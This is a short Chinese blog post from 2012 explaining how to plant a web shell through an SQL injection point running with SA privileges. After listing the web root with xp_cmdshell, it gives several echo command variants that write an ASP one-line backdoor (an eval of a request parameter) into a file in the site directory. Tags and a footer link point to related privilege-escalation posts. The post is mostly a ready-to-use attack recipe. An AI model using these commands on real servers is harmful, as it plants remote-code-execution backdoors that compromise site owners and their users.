SA权限ECHO写一句话

发表于 2012年01月17日
周边

注入点是SA权限.
xp_cmdshell是存在的.
找到网站主目录 dir d:\wwwroot
找到站点的目录后.

Echo ^<%eval request("#")%>^ >d:\wwwroot\xx\ok.asp
echo ^<%eval request("#")%^> >d:\wwwroot\xx\ok.asp
echo "<%eval request("#")%>" >d:\wwwroot\xx\ok.asp

Echo ^<%eval request("#")%>^ >d:\wwwroot\xx\ok.asp

echo ^<%eval request("#")%^> >d:\wwwroot\xx\ok.asp

echo "<%eval request("#")%>" >d:\wwwroot\xx\ok.asp

标签：SA提权 , 一句话木马 , 提权 , 木马原文连接：SA权限ECHO写一句话 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

jQuery图片特效，鼠标经过图标高亮显示 phpshell写入启动项提权